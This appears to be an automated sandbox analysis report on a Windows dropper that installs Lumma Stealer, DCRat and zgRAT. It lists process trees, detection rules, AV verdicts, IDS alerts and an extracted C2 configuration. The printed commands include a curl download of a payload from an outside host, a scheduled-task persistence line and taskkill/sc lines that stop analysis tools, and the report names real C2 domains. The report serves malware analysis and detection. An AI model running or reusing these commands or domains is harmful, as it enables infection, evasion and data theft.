    • cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 5100 cmdline: sc stop KProcessHacker3 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6676 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 4768 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 1436 cmdline: sc stop KProcessHacker2 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 6124 cmdline: C:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 7552 cmdline: sc stop KProcessHacker1 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2084 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
      • Conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1516 cmdline: C:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 7364 cmdline: sc stop wireshark MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 1132 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3748 cmdline: taskkill /f /im HTTPDebuggerUI.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7472 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1708 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 7608 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 600 cmdline: taskkill /f /im HTTPDebuggerSvc.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3348 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6136 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 6060 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 5956 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • sc.exe (PID: 5968 cmdline: sc stop HTTPDebuggerPro MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
    • cmd.exe (PID: 3792 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 6996 cmdline: taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 3452 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 1240 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2424 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 2908 cmdline: taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 1244 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7996 cmdline: taskkill /f /im FortniteClient-Win64-Shipping.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2788 cmdline: C:\Windows\system32\cmd.exe /c taskkill /f /im EpicGamesLauncher.exe >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 3408 cmdline: taskkill /f /im EpicGamesLauncher.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
    • cmd.exe (PID: 2972 cmdline: C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7404 cmdline: taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
{"C2 url": ["agentyanlark.site", "delaylacedmn.site", "famikyjdiag.site", "possiwreeste.site", "explorationmsn.stor", "commandejorsk.site", "underlinemdsj.site", "writekdmsnu.site", "bellykmrebk.site"], "Build id": "1AsNN2--5745481391"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\winlogon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    C:\Users\user\AppData\Local\winlogon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      C:\Windows\Speech\kdmapper.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Windows\Speech\kdmapper.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Edge\msedge.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            000000A1.00000000.1655201079.00000000005F2000.00000002.00000001.01000000.00000010.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  000000A1.00000002.1813420320.0000000012AC9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    Process Memory Space: rtcore64.exe PID: 2220JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                      Click to see the 2 entries
                      SourceRuleDescriptionAuthorStrings
                      52.3.kdmapper.exe.63c66cf.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                        52.3.kdmapper.exe.63c66cf.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          52.3.kdmapper.exe.63c66cf.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            52.3.kdmapper.exe.63c66cf.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              52.3.kdmapper.exe.4c616cf.1.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                Click to see the 3 entries

                                System Summary

                                barindex
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetFilename: C:\Users\user\AppData\Local\winlogon.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Users\user\AppData\Local\winlogon.exe", EventID: 13, EventType: SetValue, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4932, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, ProcessId: 1868, ProcessName: schtasks.exe
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\UY9hUZn4CQ.exe", ParentImage: C:\Users\user\Desktop\UY9hUZn4CQ.exe, ParentProcessId: 7304, ParentProcessName: UY9hUZn4CQ.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/1/imxyvi.bin --output C:\Windows\Speech\imxyvi.exe, ProcessId: 8000, ProcessName: cmd.exe
                                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\Speech\kdmapper.exe" , ParentImage: C:\Windows\Speech\kdmapper.exe, ParentProcessId: 8012, ParentProcessName: kdmapper.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" , ProcessId: 4948, ProcessName: wscript.exe
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Edge\msedge.exe, ProcessId: 7484, TargetFilename: C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.cmdline

                                Persistence and Installation Behavior

                                barindex
                                Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c taskkill /f /im FortniteClient-Win64-Shipping.exe >nul 2>&1, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4932, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 7 /tr "'C:\Users\user\AppData\Local\winlogon.exe'" /f, ProcessId: 1868, ProcessName: schtasks.exe
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:20.683051+020020546531A Network Trojan was detected192.168.2.1049719172.67.197.40443TCP
                                2024-09-30T18:20:24.575237+020020546531A Network Trojan was detected192.168.2.1049726188.114.96.3443TCP
                                2024-09-30T18:20:25.990274+020020546531A Network Trojan was detected192.168.2.1049728104.21.1.169443TCP
                                2024-09-30T18:20:28.638282+020020546531A Network Trojan was detected192.168.2.1049733172.67.197.40443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:20.683051+020020498361A Network Trojan was detected192.168.2.1049719172.67.197.40443TCP
                                2024-09-30T18:20:24.575237+020020498361A Network Trojan was detected192.168.2.1049726188.114.96.3443TCP
                                2024-09-30T18:20:25.990274+020020498361A Network Trojan was detected192.168.2.1049728104.21.1.169443TCP
                                2024-09-30T18:20:28.638282+020020498361A Network Trojan was detected192.168.2.1049733172.67.197.40443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.889040+020020560361Domain Observed Used for C2 Detected192.168.2.10624021.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.779440+020020560401Domain Observed Used for C2 Detected192.168.2.10497891.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:17.525474+020020560421Domain Observed Used for C2 Detected192.168.2.10636521.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:17.496230+020020560461Domain Observed Used for C2 Detected192.168.2.10585991.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:17.581169+020020560521Domain Observed Used for C2 Detected192.168.2.10495201.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.717882+020020560541Domain Observed Used for C2 Detected192.168.2.10651841.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.795527+020020560561Domain Observed Used for C2 Detected192.168.2.10510441.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.933938+020020560581Domain Observed Used for C2 Detected192.168.2.10512911.1.1.153UDP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-30T18:20:16.577439+020020561721Domain Observed Used for C2 Detected192.168.2.10620051.1.1.153UDP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\Users\user\AppData\Local\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: C:\Users\user\Desktop\oLoCRyrD.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                Source: C:\Windows\Speech\rtcore64.exeAvira: detection malicious, Label: HEUR/AGEN.1352236
                                Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Windows\Speech\kdmapper.exeAvira: detection malicious, Label: VBS/Runner.VPG
                                Source: C:\Users\user\AppData\Local\Temp\LZthEGCsKS.batAvira: detection malicious, Label: BAT/Delbat.C
                                Source: C:\Users\user\Desktop\QGjYUwSA.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                Source: C:\Edge\msedge.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                Source: 65.2.rtcore64.exe.6d050000.4.unpackMalware Configuration Extractor: LummaC {"C2 url": ["agentyanlark.site", "delaylacedmn.site", "famikyjdiag.site", "possiwreeste.site", "explorationmsn.stor", "commandejorsk.site", "underlinemdsj.site", "writekdmsnu.site", "bellykmrebk.site"], "Build id": "1AsNN2--5745481391"}
                                Source: C:\Edge\msedge.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\AppData\Local\winlogon.exeReversingLabs: Detection: 73%
                                Source: C:\Users\user\Desktop\ITDiARjW.logReversingLabs: Detection: 29%
                                Source: C:\Users\user\Desktop\QGjYUwSA.logReversingLabs: Detection: 70%
                                Source: C:\Users\user\Desktop\XEXXxLMp.logReversingLabs: Detection: 25%
                                Source: C:\Windows\Speech\imxyvi.exeReversingLabs: Detection: 70%
                                Source: C:\Windows\Speech\kdmapper.exeReversingLabs: Detection: 68%
                                Source: C:\Windows\Speech\physmeme.exeReversingLabs: Detection: 60%
                                Source: UY9hUZn4CQ.exeReversingLabs: Detection: 34%
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Users\user\AppData\Local\winlogon.exeJoe Sandbox ML: detected
                                Source: C:\Windows\Speech\rtcore64.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\XEXXxLMp.logJoe Sandbox ML: detected
                                Source: C:\Windows\Speech\kdmapper.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\MQshNARH.logJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\QGjYUwSA.logJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\msvcp110.dllJoe Sandbox ML: detected
                                Source: C:\Edge\msedge.exeJoe Sandbox ML: detected
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: delaylacedmn.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: writekdmsnu.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: agentyanlark.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: bellykmrebk.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: underlinemdsj.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: commandejorsk.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: possiwreeste.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: famikyjdiag.site
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: explorationmsn.stor
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                                Source: 00000049.00000002.1576346450.00000000003CB000.00000002.00000400.00020000.00000000.sdmpString decryptor: 1AsNN2--5745481391
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A9519150 CryptStringToBinaryA,?_Random_device@std@@YAIXZ,_Query_perf_frequency,_Query_perf_counter,log,cos,sin,exp,pow,tan,memset,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,memset,CryptStringToBinaryA,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,malloc,memcpy,getenv,_flushall,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,free,28_2_00007FF6A9519150
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49708 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49711 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49714 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49715 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49718 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49719 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49726 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.1.169:443 -> 192.168.2.10:49728 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.10:49732 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.67.197.40:443 -> 192.168.2.10:49733 version: TLS 1.2
                                Source: UY9hUZn4CQ.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb,, source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
                                Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000034.00000002.1496031187.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000000.1468077403.0000000000EF3000.00000002.00000001.01000000.00000009.sdmp, kdmapper.exe, 00000034.00000003.1471509432.0000000006378000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000034.00000003.1474597690.0000000004C13000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe.41.dr
                                Source: Binary string: C:\Calc\Builds\922AVUSVRZEXKB\x64\Release\Loader.pdb source: imxyvi.exe, 0000001C.00000000.1350848208.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe, 0000001C.00000002.1562839290.00007FF6A953E000.00000002.00000001.01000000.00000005.sdmp, imxyvi.exe.21.dr
                                Source: Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb source: UY9hUZn4CQ.exe
                                Source: Binary string: C:\Users\Administrator\Desktop\ENIGMA PERM\Build\ENIGMA SOLUTIONS PERM.pdb** source: UY9hUZn4CQ.exe
                                Source: Binary string: 6C:\Users\user\AppData\Local\Temp\v0obd3fi\v0obd3fi.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: 6C:\Users\user\AppData\Local\Temp\krd1dpvd\krd1dpvd.pdb source: msedge.exe, 000000A1.00000002.1763831383.0000000003023000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000001F.00000003.1395098552.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394889249.000001EC88A1C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1394980774.000001EC88A03000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000001F.00000003.1395278508.000001EC889C0000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.31.dr
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C482858 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF60C482858
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953A518 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,28_2_00007FF6A953A518
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00ECA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,52_2_00ECA69B
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,52_2_00EDC220
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EEB348 FindFirstFileExA,52_2_00EEB348
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D072A2D FindFirstFileExW,65_2_6D072A2D
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Documents\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local\Temp
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user\AppData\Local
                                Source: C:\Edge\msedge.exeFile opened: C:\Users\user
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]47_2_0040F7B0
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]47_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]47_2_0041407F
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]47_2_00414031
